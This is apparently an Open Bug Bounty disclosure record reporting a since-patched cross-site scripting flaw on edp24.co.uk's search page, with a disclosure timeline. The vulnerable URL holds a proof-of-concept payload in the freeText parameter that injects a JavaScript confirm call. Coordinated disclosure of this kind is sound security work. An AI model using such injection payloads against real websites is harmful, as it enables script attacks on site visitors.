edp24.co.uk XSS vulnerability

2016-03-29T14:20:00
ID OBB:143877
Type openbugbounty
Reporter Lewis
Modified 2016-06-22T07:26:00

Description

Vulnerable URL:
http://www.edp24.co.uk/home/search?numberOfItemsPerPage=10&sort;=publishedDate_descending&filterToDate;=&longTo;=NaN&freeText;=%22%2Bconfirm%28%27XSSPOSED%27%29%2B%22&selectedCategories;=[]&includeSiteIds;=[YarmouthMercury.d]&action;=search&longitude;=NaN&numberOfItemsToSearchPerPage;=10&resultsSearch;=&submitted;=true&toDate;=29%2F03%2F2016&excludeSiteIds;=[]&longFrom;=NaN&excludedCategories;=[]&siteExternalID;=yarmouthmercury.d&distanceInMiles;=0.0&fromDate;=&siteId;=2.970&latFrom;=NaN&latTo;=NaN&facetQueries;=publishedDate%3A[NOW%2FDAY-7DAYS+TO+NOW]&facetQueries;=publishedDate%3A[NOW%2FYEAR+TO+NOW]&facetQueries;=publishedDate%3A[NOW%2FDAY-30DAYS+TO+NOW]&facetQueries;=publishedDate%3A[NOW%2FDAY+TO+NOW]&latitude;=NaN&filterFromDate;=&facetFields;=tree_department.categorydimension.archant&publishDateInterval;=uk.co.polopoly.search.util.DateInterval%40678fec9f
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 50275
Google Pagerank| 6
VIP website status:| No
Check edp24.co.uk SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 March, 2016 14:20 GMT
Generic security notifications sent to website owner| 29 March, 2016 14:22 GMT
Vulnerability details disclosed by researcher| 21 June, 2016 15:11 GMT
Vulnerability patched by the website owner| 22 June, 2016 07:26 GMT